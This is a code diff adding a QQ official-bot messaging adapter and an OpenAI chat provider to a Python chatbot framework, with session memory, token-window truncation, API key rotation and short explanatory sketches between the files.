|
||||
def get_client(self):
|
||||
return self.client
|
||||
|
||||
async def nakuru_method_invoker(self, func, *args, **kwargs):
|
||||
"""
|
||||
返回一个方法调用器,可以用来立即调用nakuru的方法。
|
||||
"""
|
||||
try:
|
||||
ret = func(*args, **kwargs)
|
||||
return ret
|
||||
except BaseException as e:
|
||||
raise e
|
||||
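A short sketch of how a plugin could reply through the QQGOCQ adapter above; `platform` and `event` stand for the instances the framework passes in, and the reply text is a placeholder.

from nakuru.entities.components import Plain

async def reply_hello(platform, event):
    # passive reply: reuse the received message object; send() delegates to reply_msg()
    await platform.send(event.message_obj, [Plain(text="你好,我在。")])
    # to block for the session's next message (synchronous polling, 300 s timeout):
    # next_msg = platform.wait_for_message(event.session_id)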
308
model/platform/qq_official.py
Normal file
@@ -0,0 +1,308 @@
|
||||
import io
|
||||
import botpy
|
||||
from PIL import Image as PILImage
|
||||
import botpy.message
|
||||
import re
|
||||
import asyncio
|
||||
import aiohttp
|
||||
import botpy.types
|
||||
import botpy.types.message
|
||||
from util import general_utils as gu
|
||||
|
||||
from botpy.types.message import Reference
|
||||
from botpy import Client
|
||||
import time
|
||||
from ._platfrom import Platform
|
||||
from ._message_parse import (
|
||||
qq_official_message_parse_rev,
|
||||
qq_official_message_parse
|
||||
)
|
||||
from type.message import *
|
||||
from typing import Union, List
|
||||
from nakuru.entities.components import BaseMessageComponent
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
# QQ 机器人官方框架
|
||||
class botClient(Client):
|
||||
def set_platform(self, platform: 'QQOfficial'):
|
||||
self.platform = platform
|
||||
|
||||
async def on_group_at_message_create(self, message: botpy.message.GroupMessage):
|
||||
abm = qq_official_message_parse_rev(message, MessageType.GROUP_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到频道消息
|
||||
async def on_at_message_create(self, message: botpy.message.Message):
|
||||
# 转换层
|
||||
abm = qq_official_message_parse_rev(message, MessageType.GUILD_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
# 收到私聊消息
|
||||
async def on_direct_message_create(self, message: botpy.message.DirectMessage):
|
||||
# 转换层
|
||||
abm = qq_official_message_parse_rev(
|
||||
message, MessageType.FRIEND_MESSAGE)
|
||||
await self.platform.handle_msg(abm)
|
||||
|
||||
|
||||
class QQOfficial(Platform):
|
||||
|
||||
def __init__(self, cfg: dict, message_handler: callable, global_object) -> None:
|
||||
super().__init__(message_handler)
|
||||
|
||||
self.loop = asyncio.new_event_loop()
|
||||
asyncio.set_event_loop(self.loop)
|
||||
|
||||
self.waiting: dict = {}
|
||||
|
||||
self.cfg = cfg
|
||||
self.appid = cfg['qqbot']['appid']
|
||||
self.token = cfg['qqbot']['token']
|
||||
self.secret = cfg['qqbot_secret']
|
||||
self.unique_session = cfg['uniqueSessionMode']
|
||||
qq_group = cfg['qqofficial_enable_group_message']
|
||||
|
||||
if qq_group:
|
||||
self.intents = botpy.Intents(
|
||||
public_messages=True,
|
||||
public_guild_messages=True,
|
||||
direct_message=cfg['direct_message_mode']
|
||||
)
|
||||
else:
|
||||
self.intents = botpy.Intents(
|
||||
public_guild_messages=True,
|
||||
direct_message=cfg['direct_message_mode']
|
||||
)
|
||||
self.client = botClient(
|
||||
intents=self.intents,
|
||||
bot_log=False
|
||||
)
|
||||
|
||||
self.client.set_platform(self)
|
||||
|
||||
def run(self):
|
||||
try:
|
||||
self.loop.run_until_complete(self.client.run(
|
||||
appid=self.appid,
|
||||
secret=self.secret
|
||||
))
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
self.client = botClient(
|
||||
intents=self.intents,
|
||||
bot_log=False
|
||||
)
|
||||
self.client.set_platform(self)
|
||||
self.client.run(
|
||||
appid=self.appid,
|
||||
token=self.token
|
||||
)
|
||||
|
||||
async def handle_msg(self, message: AstrBotMessage):
|
||||
assert isinstance(message.raw_message, (botpy.message.Message,
|
||||
botpy.message.GroupMessage, botpy.message.DirectMessage))
|
||||
is_group = message.type != MessageType.FRIEND_MESSAGE
|
||||
|
||||
_t = "/私聊" if not is_group else ""
|
||||
logger.info(
|
||||
f"{message.sender.nickname}({message.sender.user_id}{_t}) -> {self.parse_message_outline(message)}")
|
||||
|
||||
# 解析出 session_id
|
||||
if self.unique_session or not is_group:
|
||||
session_id = message.sender.user_id
|
||||
else:
|
||||
if message.type == MessageType.GUILD_MESSAGE:
|
||||
session_id = message.raw_message.channel_id
|
||||
elif message.type == MessageType.GROUP_MESSAGE:
|
||||
session_id = str(message.raw_message.group_openid)
|
||||
else:
|
||||
session_id = str(message.raw_message.author.id)
|
||||
message.session_id = session_id
|
||||
|
||||
# 解析出 role
|
||||
sender_id = message.sender.user_id
|
||||
if sender_id == self.cfg['admin_qqchan'] or \
|
||||
sender_id in self.cfg['other_admins']:
|
||||
role = 'admin'
|
||||
else:
|
||||
role = 'member'
|
||||
|
||||
message_result = await self.message_handler(
|
||||
message=message,
|
||||
session_id=session_id,
|
||||
role=role,
|
||||
platform='qqchan'
|
||||
)
|
||||
|
||||
if message_result is None:
|
||||
return
|
||||
|
||||
await self.reply_msg(message, message_result.result_message)
|
||||
if message_result.callback is not None:
|
||||
message_result.callback()
|
||||
|
||||
# 如果是等待回复的消息
|
||||
if session_id in self.waiting and self.waiting[session_id] == '':
|
||||
self.waiting[session_id] = message
|
||||
|
||||
async def reply_msg(self,
|
||||
message: Union[botpy.message.Message, botpy.message.GroupMessage, botpy.message.DirectMessage, AstrBotMessage],
|
||||
res: Union[str, list]):
|
||||
'''
|
||||
回复频道消息
|
||||
'''
|
||||
if isinstance(message, AstrBotMessage):
|
||||
source = message.raw_message
|
||||
else:
|
||||
source = message
|
||||
assert isinstance(source, (botpy.message.Message,
|
||||
botpy.message.GroupMessage, botpy.message.DirectMessage))
|
||||
logger.info(
|
||||
f"{message.sender.nickname}({message.sender.user_id}) <- {self.parse_message_outline(res)}")
|
||||
|
||||
plain_text = ''
|
||||
image_path = ''
|
||||
msg_ref = None
|
||||
|
||||
if isinstance(res, list):
|
||||
plain_text, image_path = qq_official_message_parse(res)
|
||||
elif isinstance(res, str):
|
||||
plain_text = res
|
||||
|
||||
if self.cfg['qq_pic_mode']:
|
||||
# 文本转图片,并且加上原来的图片
|
||||
if plain_text != '' or image_path != '':
|
||||
if image_path is not None and image_path != '':
|
||||
if image_path.startswith("http"):
|
||||
plain_text += "\n\n" + ""
|
||||
else:
|
||||
plain_text += "\n\n" + \
|
||||
""
|
||||
image_path = gu.create_markdown_image("".join(plain_text))
|
||||
plain_text = ""
|
||||
|
||||
else:
|
||||
if image_path is not None and image_path != '':
|
||||
msg_ref = None
|
||||
if image_path.startswith("http"):
|
||||
async with aiohttp.ClientSession() as session:
|
||||
async with session.get(image_path) as response:
|
||||
if response.status == 200:
|
||||
image = PILImage.open(io.BytesIO(await response.read()))
|
||||
image_path = gu.save_temp_img(image)
|
||||
|
||||
if source is not None and image_path == '': # file_image与message_reference不能同时传入
|
||||
msg_ref = Reference(message_id=source.id,
|
||||
ignore_get_message_error=False)
|
||||
|
||||
# 到这里,我们得到了 plain_text,image_path,msg_ref
|
||||
data = {
|
||||
'content': plain_text,
|
||||
'msg_id': message.message_id,
|
||||
'message_reference': msg_ref
|
||||
}
|
||||
if message.type == MessageType.GROUP_MESSAGE:
|
||||
data['group_openid'] = str(source.group_openid)
|
||||
elif message.type == MessageType.GUILD_MESSAGE:
|
||||
data['channel_id'] = source.channel_id
|
||||
elif message.type == MessageType.FRIEND_MESSAGE:
|
||||
# 目前只处理频道私聊
|
||||
data['guild_id'] = source.guild_id
|
||||
else:
|
||||
raise ValueError(f"未知的消息类型: {message.type}")
|
||||
if image_path != '':
|
||||
data['file_image'] = image_path
|
||||
|
||||
try:
|
||||
await self._send_wrapper(**data)
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
# 分割过长的消息
|
||||
if "msg over length" in str(e):
|
||||
split_res = []
|
||||
split_res.append(plain_text[:len(plain_text)//2])
|
||||
split_res.append(plain_text[len(plain_text)//2:])
|
||||
for i in split_res:
|
||||
data['content'] = i
|
||||
await self._send_wrapper(**data)
|
||||
else:
|
||||
# 发送qq信息
|
||||
try:
|
||||
# 防止被qq频道过滤消息
|
||||
plain_text = plain_text.replace(".", " . ")
|
||||
await self._send_wrapper(**data)
|
||||
|
||||
except BaseException as e:
|
||||
try:
|
||||
data['content'] = str.join(" ", plain_text)
|
||||
await self._send_wrapper(**data)
|
||||
except BaseException as e:
|
||||
plain_text = re.sub(
|
||||
r'(https|http)?:\/\/(\w|\.|\/|\?|\=|\&|\%)*\b', '[被隐藏的链接]', str(e), flags=re.MULTILINE)
|
||||
plain_text = plain_text.replace(".", "·")
|
||||
data['content'] = plain_text
|
||||
await self._send_wrapper(**data)
|
||||
|
||||
async def _send_wrapper(self, **kwargs):
|
||||
if 'group_openid' in kwargs:
|
||||
# QQ群组消息
|
||||
media = None
|
||||
# qq群组消息需要自行上传,暂时不处理
|
||||
# if 'file_image' in kwargs:
|
||||
# file_image_path = kwargs['file_image']
|
||||
# if file_image_path != "":
|
||||
# media = await self.upload_img(file_image_path, kwargs['group_openid'])
|
||||
# del kwargs['file_image']
|
||||
# if media is not None:
|
||||
# kwargs['msg_type'] = 7 # 富媒体
|
||||
await self.client.api.post_group_message(media=media, **kwargs)
|
||||
elif 'channel_id' in kwargs:
|
||||
# 频道消息
|
||||
if 'file_image' in kwargs:
|
||||
kwargs['file_image'] = kwargs['file_image'].replace(
|
||||
"file://", "")
|
||||
await self.client.api.post_message(**kwargs)
|
||||
else:
|
||||
# 频道私聊消息
|
||||
if 'file_image' in kwargs:
|
||||
kwargs['file_image'] = kwargs['file_image'].replace(
|
||||
"file://", "")
|
||||
await self.client.api.post_dms(**kwargs)
|
||||
|
||||
async def send_msg(self,
|
||||
message_obj: Union[botpy.message.Message, botpy.message.GroupMessage, botpy.message.DirectMessage, AstrBotMessage],
|
||||
message_chain: List[BaseMessageComponent],
|
||||
):
|
||||
'''
|
||||
发送消息。目前只支持被动回复消息(即拥有一个 botpy Message 类型的 message_obj 传入)
|
||||
'''
|
||||
await self.reply_msg(message_obj, message_chain)
|
||||
|
||||
async def send(self,
|
||||
message_obj: Union[botpy.message.Message, botpy.message.GroupMessage, botpy.message.DirectMessage, AstrBotMessage],
|
||||
message_chain: List[BaseMessageComponent],
|
||||
):
|
||||
'''
|
||||
发送消息。目前只支持被动回复消息(即拥有一个 botpy Message 类型的 message_obj 传入)
|
||||
'''
|
||||
await self.reply_msg(message_obj, message_chain)
|
||||
|
||||
def wait_for_message(self, channel_id: int) -> AstrBotMessage:
|
||||
'''
|
||||
等待指定 channel_id 的下一条信息,超时 300s 后抛出异常
|
||||
'''
|
||||
self.waiting[channel_id] = ''
|
||||
cnt = 0
|
||||
while True:
|
||||
if channel_id in self.waiting and self.waiting[channel_id] != '':
|
||||
# 去掉
|
||||
ret = self.waiting[channel_id]
|
||||
del self.waiting[channel_id]
|
||||
return ret
|
||||
cnt += 1
|
||||
if cnt > 300:
|
||||
raise Exception("等待消息超时。")
|
||||
time.sleep(1)
|
||||
495
model/provider/openai_official.py
Normal file
@@ -0,0 +1,495 @@
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
import time
|
||||
import tiktoken
|
||||
import threading
|
||||
import traceback
|
||||
import base64
|
||||
|
||||
from openai import AsyncOpenAI
|
||||
from openai.types.images_response import ImagesResponse
|
||||
from openai.types.chat.chat_completion import ChatCompletion
|
||||
from openai._exceptions import *
|
||||
|
||||
from persist.session import dbConn
|
||||
from model.provider.provider import Provider
|
||||
from util import general_utils as gu
|
||||
from util.cmd_config import CmdConfig
|
||||
from SparkleLogging.utils.core import LogManager
|
||||
from logging import Logger
|
||||
from typing import List, Dict
|
||||
|
||||
logger: Logger = LogManager.GetLogger(log_name='astrbot-core')
|
||||
|
||||
MODELS = {
|
||||
"gpt-4o": 128000,
|
||||
"gpt-4o-2024-05-13": 128000,
|
||||
"gpt-4-turbo": 128000,
|
||||
"gpt-4-turbo-2024-04-09": 128000,
|
||||
"gpt-4-turbo-preview": 128000,
|
||||
"gpt-4-0125-preview": 128000,
|
||||
"gpt-4-1106-preview": 128000,
|
||||
"gpt-4-vision-preview": 128000,
|
||||
"gpt-4-1106-vision-preview": 128000,
|
||||
"gpt-4": 8192,
|
||||
"gpt-4-0613": 8192,
|
||||
"gpt-4-32k": 32768,
|
||||
"gpt-4-32k-0613": 32768,
|
||||
"gpt-3.5-turbo-0125": 16385,
|
||||
"gpt-3.5-turbo": 16385,
|
||||
"gpt-3.5-turbo-1106": 16385,
|
||||
"gpt-3.5-turbo-instruct": 4096,
|
||||
"gpt-3.5-turbo-16k": 16385,
|
||||
"gpt-3.5-turbo-0613": 16385,
|
||||
"gpt-3.5-turbo-16k-0613": 16385,
|
||||
}
|
||||
|
||||
class ProviderOpenAIOfficial(Provider):
|
||||
def __init__(self, cfg) -> None:
|
||||
super().__init__()
|
||||
|
||||
os.makedirs("data/openai", exist_ok=True)
|
||||
|
||||
self.cc = CmdConfig()
|
||||
self.key_data_path = "data/openai/keys.json"
|
||||
self.api_keys = []
|
||||
self.chosen_api_key = None
|
||||
self.base_url = None
|
||||
self.keys_data = {} # 记录超额
|
||||
|
||||
if cfg['key']: self.api_keys = cfg['key']
|
||||
if cfg['api_base']: self.base_url = cfg['api_base']
|
||||
if not self.api_keys:
|
||||
logger.warn("看起来你没有添加 OpenAI 的 API 密钥,OpenAI LLM 能力将不会启用。")
|
||||
else:
|
||||
self.chosen_api_key = self.api_keys[0]
|
||||
|
||||
for key in self.api_keys:
|
||||
self.keys_data[key] = True
|
||||
|
||||
self.client = AsyncOpenAI(
|
||||
api_key=self.chosen_api_key,
|
||||
base_url=self.base_url
|
||||
)
|
||||
self.model_configs: Dict = cfg['chatGPTConfigs']
|
||||
self.image_generator_model_configs: Dict = self.cc.get('openai_image_generate', None)
|
||||
self.session_memory: Dict[str, List] = {} # 会话记忆
|
||||
self.session_memory_lock = threading.Lock()
|
||||
self.max_tokens = self.model_configs['max_tokens'] # 上下文窗口大小
|
||||
self.tokenizer = tiktoken.get_encoding("cl100k_base") # todo: 根据 model 切换分词器
|
||||
self.DEFAULT_PERSONALITY = {
|
||||
"name": "default",
|
||||
"prompt": "你是一个很有帮助的 AI 助手。"
|
||||
}
|
||||
self.curr_personality = self.DEFAULT_PERSONALITY
|
||||
self.session_personality = {} # 记录了某个session是否已设置人格。
|
||||
# 从 SQLite DB 读取历史记录
|
||||
try:
|
||||
db1 = dbConn()
|
||||
for session in db1.get_all_session():
|
||||
self.session_memory_lock.acquire()
|
||||
self.session_memory[session[0]] = json.loads(session[1])['data']
|
||||
self.session_memory_lock.release()
|
||||
except BaseException as e:
|
||||
logger.warn(f"读取 OpenAI LLM 对话历史记录 失败:{e}。仍可正常使用。")
|
||||
|
||||
# 定时保存历史记录
|
||||
threading.Thread(target=self.dump_history, daemon=True).start()
|
||||
|
||||
def dump_history(self):
|
||||
'''
|
||||
转储历史记录
|
||||
'''
|
||||
time.sleep(10)
|
||||
db = dbConn()
|
||||
while True:
|
||||
try:
|
||||
for key in self.session_memory:
|
||||
data = self.session_memory[key]
|
||||
data_json = {
|
||||
'data': data
|
||||
}
|
||||
if db.check_session(key):
|
||||
db.update_session(key, json.dumps(data_json))
|
||||
else:
|
||||
db.insert_session(key, json.dumps(data_json))
|
||||
logger.debug("已保存 OpenAI 会话历史记录")
|
||||
except BaseException as e:
|
||||
print(e)
|
||||
finally:
|
||||
time.sleep(10*60)
|
||||
|
||||
def personality_set(self, default_personality: dict, session_id: str):
|
||||
if not default_personality: return
|
||||
if session_id not in self.session_memory:
|
||||
self.session_memory[session_id] = []
|
||||
self.curr_personality = default_personality
|
||||
self.session_personality = {} # 重置
|
||||
encoded_prompt = self.tokenizer.encode(default_personality['prompt'])
|
||||
tokens_num = len(encoded_prompt)
|
||||
model = self.model_configs['model']
|
||||
if model in MODELS and tokens_num > MODELS[model] - 500:
|
||||
default_personality['prompt'] = self.tokenizer.decode(encoded_prompt[:MODELS[model] - 500])
|
||||
|
||||
new_record = {
|
||||
"user": {
|
||||
"role": "system",
|
||||
"content": default_personality['prompt'],
|
||||
},
|
||||
'usage_tokens': 0, # 到该条目的总 token 数
|
||||
'single_tokens': 0 # 该条目的 token 数
|
||||
}
|
||||
|
||||
self.session_memory[session_id].append(new_record)
|
||||
|
||||
async def encode_image_bs64(self, image_url: str) -> str:
|
||||
'''
|
||||
将图片转换为 base64
|
||||
'''
|
||||
if image_url.startswith("http"):
|
||||
image_url = await gu.download_image_by_url(image_url)
|
||||
|
||||
with open(image_url, "rb") as f:
|
||||
image_bs64 = base64.b64encode(f.read()).decode()
|
||||
return "data:image/jpeg;base64," + image_bs64
|
||||
|
||||
async def retrieve_context(self, session_id: str):
|
||||
'''
|
||||
根据 session_id 获取保存的 OpenAI 格式的上下文
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
# 转换为 openai 要求的格式
|
||||
context = []
|
||||
is_lvm = await self.is_lvm()
|
||||
for record in self.session_memory[session_id]:
|
||||
if "user" in record and record['user']:
|
||||
if not is_lvm and "content" in record['user'] and isinstance(record['user']['content'], list):
|
||||
logger.warn(f"由于当前模型 {self.model_configs['model']}不支持视觉,将忽略上下文中的图片输入。如果一直弹出此警告,可以尝试 reset 指令。")
|
||||
continue
|
||||
context.append(record['user'])
|
||||
if "AI" in record and record['AI']:
|
||||
context.append(record['AI'])
|
||||
|
||||
return context
|
||||
|
||||
async def is_lvm(self):
|
||||
'''
|
||||
是否是 LVM
|
||||
'''
|
||||
return self.model_configs['model'].startswith("gpt-4")
|
||||
|
||||
async def get_models(self):
|
||||
'''
|
||||
获取所有模型
|
||||
'''
|
||||
models = await self.client.models.list()
|
||||
logger.info(f"OpenAI 模型列表:{models}")
|
||||
return models
|
||||
|
||||
async def assemble_context(self, session_id: str, prompt: str, image_url: str = None):
|
||||
'''
|
||||
组装上下文,并且根据当前上下文窗口大小截断
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
tokens_num = len(self.tokenizer.encode(prompt))
|
||||
previous_total_tokens_num = 0 if not self.session_memory[session_id] else self.session_memory[session_id][-1]['usage_tokens']
|
||||
|
||||
message = {
|
||||
"usage_tokens": previous_total_tokens_num + tokens_num,
|
||||
"single_tokens": tokens_num,
|
||||
"AI": None
|
||||
}
|
||||
if image_url:
|
||||
user_content = {
|
||||
"role": "user",
|
||||
"content": [
|
||||
{
|
||||
"type": "text",
|
||||
"text": prompt
|
||||
},
|
||||
{
|
||||
"type": "image_url",
|
||||
"image_url": {
|
||||
"url": await self.encode_image_bs64(image_url)
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
else:
|
||||
user_content = {
|
||||
"role": "user",
|
||||
"content": prompt
|
||||
}
|
||||
|
||||
message["user"] = user_content
|
||||
self.session_memory[session_id].append(message)
|
||||
|
||||
# 根据 模型的上下文窗口 淘汰掉多余的记录
|
||||
curr_model = self.model_configs['model']
|
||||
if curr_model in MODELS:
|
||||
maxium_tokens_num = MODELS[curr_model] - 300 # 至少预留 300 给 completion
|
||||
# if message['usage_tokens'] > maxium_tokens_num:
|
||||
# 淘汰多余的记录,使得最终的 usage_tokens 不超过 maxium_tokens_num - 300
|
||||
# contexts = self.session_memory[session_id]
|
||||
# need_to_remove_idx = 0
|
||||
# freed_tokens_num = contexts[0]['single-tokens']
|
||||
# while freed_tokens_num < message['usage_tokens'] - maxium_tokens_num:
|
||||
# need_to_remove_idx += 1
|
||||
# freed_tokens_num += contexts[need_to_remove_idx]['single-tokens']
|
||||
# # 更新之后的所有记录的 usage_tokens
|
||||
# for i in range(len(contexts)):
|
||||
# if i > need_to_remove_idx:
|
||||
# contexts[i]['usage_tokens'] -= freed_tokens_num
|
||||
# logger.debug(f"淘汰上下文记录 {need_to_remove_idx+1} 条,释放 {freed_tokens_num} 个 token。当前上下文总 token 为 {contexts[-1]['usage_tokens']}。")
|
||||
# self.session_memory[session_id] = contexts[need_to_remove_idx+1:]
|
||||
while len(self.session_memory[session_id]) and self.session_memory[session_id][-1]['usage_tokens'] > maxium_tokens_num:
|
||||
await self.pop_record(session_id)
|
||||
|
||||
|
||||
async def pop_record(self, session_id: str, pop_system_prompt: bool = False):
|
||||
'''
|
||||
弹出第一条记录
|
||||
'''
|
||||
if session_id not in self.session_memory:
|
||||
raise Exception("会话 ID 不存在")
|
||||
|
||||
if len(self.session_memory[session_id]) == 0:
|
||||
return None
|
||||
|
||||
for i in range(len(self.session_memory[session_id])):
|
||||
# 检查是否是 system prompt
|
||||
if not pop_system_prompt and self.session_memory[session_id][i]['user']['role'] == "system":
|
||||
# 如果只有一个 system prompt,才不删掉
|
||||
f = False
|
||||
for j in range(i+1, len(self.session_memory[session_id])):
|
||||
if self.session_memory[session_id][j]['user']['role'] == "system":
|
||||
f = True
|
||||
break
|
||||
if not f:
|
||||
continue
|
||||
record = self.session_memory[session_id].pop(i)
|
||||
break
|
||||
|
||||
# 更新之后所有记录的 usage_tokens
|
||||
for i in range(len(self.session_memory[session_id])):
|
||||
self.session_memory[session_id][i]['usage_tokens'] -= record['single_tokens']
logger.debug(f"淘汰上下文记录 1 条,释放 {record['single_tokens']} 个 token。当前上下文总 token 为 {self.session_memory[session_id][-1]['usage_tokens']}。")
|
||||
return record
|
||||
|
||||
async def text_chat(self,
|
||||
prompt: str,
|
||||
session_id: str,
|
||||
image_url: None=None,
|
||||
tools: None=None,
|
||||
extra_conf: Dict = None,
|
||||
**kwargs
|
||||
) -> str:
|
||||
if not session_id:
|
||||
session_id = "unknown"
|
||||
if "unknown" in self.session_memory:
|
||||
del self.session_memory["unknown"]
|
||||
|
||||
if session_id not in self.session_memory:
|
||||
self.session_memory[session_id] = []
|
||||
|
||||
if session_id not in self.session_personality or not self.session_personality[session_id]:
|
||||
self.personality_set(self.curr_personality, session_id)
|
||||
self.session_personality[session_id] = True
|
||||
|
||||
# 如果 prompt 超过了最大窗口,截断。
|
||||
# 1. 可以保证之后 pop 的时候不会出现问题
|
||||
# 2. 可以保证不会超过最大 token 数
|
||||
_encoded_prompt = self.tokenizer.encode(prompt)
|
||||
curr_model = self.model_configs['model']
|
||||
if curr_model in MODELS and len(_encoded_prompt) > MODELS[curr_model] - 300:
|
||||
_encoded_prompt = _encoded_prompt[:MODELS[curr_model] - 300]
|
||||
prompt = self.tokenizer.decode(_encoded_prompt)
|
||||
|
||||
# 组装上下文,并且根据当前上下文窗口大小截断
|
||||
await self.assemble_context(session_id, prompt, image_url)
|
||||
|
||||
# 获取上下文,openai 格式
|
||||
contexts = await self.retrieve_context(session_id)
|
||||
|
||||
conf = self.model_configs
|
||||
if extra_conf: conf.update(extra_conf)
|
||||
|
||||
# start request
|
||||
retry = 0
|
||||
rate_limit_retry = 0
|
||||
while retry < 3 or rate_limit_retry < 5:
|
||||
logger.debug(conf)
|
||||
logger.debug(contexts)
|
||||
if tools:
|
||||
completion_coro = self.client.chat.completions.create(
|
||||
messages=contexts,
|
||||
tools=tools,
|
||||
**conf
|
||||
)
|
||||
else:
|
||||
completion_coro = self.client.chat.completions.create(
|
||||
messages=contexts,
|
||||
**conf
|
||||
)
|
||||
try:
|
||||
completion = await completion_coro
|
||||
break
|
||||
except AuthenticationError as e:
|
||||
api_key = self.chosen_api_key[:10] + "..."
|
||||
logger.error(f"OpenAI API Key {api_key} 验证错误。详细原因:{e}。正在切换到下一个可用的 Key(如果有的话)")
|
||||
self.keys_data[self.chosen_api_key] = False
|
||||
ok = await self.switch_to_next_key()
|
||||
if ok: continue
|
||||
else: raise Exception("所有 OpenAI API Key 目前都不可用。")
|
||||
except BadRequestError as e:
|
||||
logger.warn(f"OpenAI 请求异常:{e}。")
|
||||
if "image_url is only supported by certain models." in str(e):
|
||||
raise Exception(f"当前模型 { self.model_configs['model'] } 不支持图片输入,请更换模型。")
|
||||
retry += 1
|
||||
except RateLimitError as e:
|
||||
if "You exceeded your current quota" in str(e):
|
||||
self.keys_data[self.chosen_api_key] = False
|
||||
ok = await self.switch_to_next_key()
|
||||
if ok: continue
|
||||
else: raise Exception("所有 OpenAI API Key 目前都不可用。")
|
||||
logger.error(f"OpenAI API Key {self.chosen_api_key} 达到请求速率限制或者官方服务器当前超载。详细原因:{e}")
|
||||
await self.switch_to_next_key()
|
||||
rate_limit_retry += 1
|
||||
time.sleep(1)
|
||||
except Exception as e:
|
||||
retry += 1
|
||||
if retry >= 3:
|
||||
logger.error(traceback.format_exc())
|
||||
raise Exception(f"OpenAI 请求失败:{e}。重试次数已达到上限。")
|
||||
if "maximum context length" in str(e):
|
||||
logger.warn(f"OpenAI 请求失败:{e}。上下文长度超过限制。尝试弹出最早的记录然后重试。")
|
||||
await self.pop_record(session_id)
|
||||
|
||||
logger.warning(f"OpenAI 请求失败:{e}。重试第 {retry} 次。")
|
||||
time.sleep(1)
|
||||
|
||||
assert isinstance(completion, ChatCompletion)
|
||||
logger.debug(f"openai completion: {completion.usage}")
|
||||
|
||||
choice = completion.choices[0]
|
||||
|
||||
usage_tokens = completion.usage.total_tokens
|
||||
completion_tokens = completion.usage.completion_tokens
|
||||
self.session_memory[session_id][-1]['usage_tokens'] = usage_tokens
|
||||
self.session_memory[session_id][-1]['single_tokens'] += completion_tokens
|
||||
|
||||
if choice.message.content:
|
||||
# 返回文本
|
||||
completion_text = str(choice.message.content).strip()
|
||||
elif choice.message.tool_calls:
|
||||
# tools call (function calling)
|
||||
return choice.message.tool_calls[0].function
|
||||
|
||||
self.session_memory[session_id][-1]['AI'] = {
|
||||
"role": "assistant",
|
||||
"content": completion_text
|
||||
}
|
||||
|
||||
return completion_text
|
||||
|
||||
async def switch_to_next_key(self):
|
||||
'''
|
||||
切换到下一个 API Key
|
||||
'''
|
||||
if not self.api_keys:
|
||||
logger.error("OpenAI API Key 不存在。")
|
||||
return False
|
||||
|
||||
for key in self.keys_data:
|
||||
if self.keys_data[key]:
|
||||
# 没超额
|
||||
self.chosen_api_key = key
|
||||
self.client.api_key = key
|
||||
logger.info(f"OpenAI 切换到 API Key {key[:10]}... 成功。")
|
||||
return True
|
||||
|
||||
return False
|
||||
|
||||
async def image_generate(self, prompt, session_id, **kwargs) -> str:
|
||||
'''
|
||||
生成图片
|
||||
'''
|
||||
retry = 0
|
||||
conf = self.image_generator_model_configs
|
||||
if not conf:
|
||||
logger.error("OpenAI 图片生成模型配置不存在。")
|
||||
raise Exception("OpenAI 图片生成模型配置不存在。")
|
||||
|
||||
while retry < 3:
|
||||
try:
|
||||
images_response = await self.client.images.generate(
|
||||
prompt=prompt,
|
||||
**conf
|
||||
)
|
||||
image_url = images_response.data[0].url
|
||||
return image_url
|
||||
except Exception as e:
|
||||
retry += 1
|
||||
if retry >= 3:
|
||||
logger.error(traceback.format_exc())
|
||||
raise Exception(f"OpenAI 图片生成请求失败:{e}。重试次数已达到上限。")
|
||||
logger.warning(f"OpenAI 图片生成请求失败:{e}。重试第 {retry} 次。")
|
||||
time.sleep(1)
|
||||
|
||||
async def forget(self, session_id=None, keep_system_prompt: bool=False) -> bool:
|
||||
if session_id is None: return False
|
||||
self.session_memory[session_id] = []
|
||||
if keep_system_prompt:
|
||||
self.personality_set(self.curr_personality, session_id)
|
||||
else:
|
||||
self.curr_personality = self.DEFAULT_PERSONALITY
|
||||
return True
|
||||
|
||||
def dump_contexts_page(self, session_id: str, size=5, page=1,):
|
||||
'''
|
||||
获取缓存的会话
|
||||
'''
|
||||
# contexts_str = ""
|
||||
# for i, key in enumerate(self.session_memory):
|
||||
# if i < (page-1)*size or i >= page*size:
|
||||
# continue
|
||||
# contexts_str += f"Session ID: {key}\n"
|
||||
# for record in self.session_memory[key]:
|
||||
# if "user" in record:
|
||||
# contexts_str += f"User: {record['user']['content']}\n"
|
||||
# if "AI" in record:
|
||||
# contexts_str += f"AI: {record['AI']['content']}\n"
|
||||
# contexts_str += "---\n"
|
||||
contexts_str = ""
|
||||
if session_id in self.session_memory:
|
||||
for record in self.session_memory[session_id]:
|
||||
if "user" in record and record['user']:
|
||||
text = record['user']['content'][:100] + "..." if len(record['user']['content']) > 100 else record['user']['content']
|
||||
contexts_str += f"User: {text}\n"
|
||||
if "AI" in record and record['AI']:
|
||||
text = record['AI']['content'][:100] + "..." if len(record['AI']['content']) > 100 else record['AI']['content']
|
||||
contexts_str += f"Assistant: {text}\n"
|
||||
else:
|
||||
contexts_str = "会话 ID 不存在。"
|
||||
|
||||
return contexts_str, len(self.session_memory.get(session_id, []))
|
||||
|
||||
def set_model(self, model: str):
|
||||
self.model_configs['model'] = model
|
||||
|
||||
def get_configs(self):
|
||||
return self.model_configs
|
||||
|
||||
def get_keys_data(self):
|
||||
return self.keys_data
|
||||
|
||||
def get_curr_key(self):
|
||||
return self.chosen_api_key
|
||||
|
||||
def set_key(self, key):
|
||||
self.client.api_key = key
|
||||
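To clarify the bookkeeping that personality_set, assemble_context and pop_record share, a standalone sketch of one session-memory record and the tiktoken counting behind usage_tokens; the session id and prompt are made up.

import tiktoken

tokenizer = tiktoken.get_encoding("cl100k_base")
session_memory = {"qq_12345": []}              # hypothetical session id

prompt = "帮我写一首关于秋天的诗"
tokens_num = len(tokenizer.encode(prompt))
prev_total = 0 if not session_memory["qq_12345"] else session_memory["qq_12345"][-1]["usage_tokens"]

# same record layout as assemble_context: usage_tokens is the running total up to this entry
record = {
    "usage_tokens": prev_total + tokens_num,
    "single_tokens": tokens_num,
    "user": {"role": "user", "content": prompt},
    "AI": None,
}
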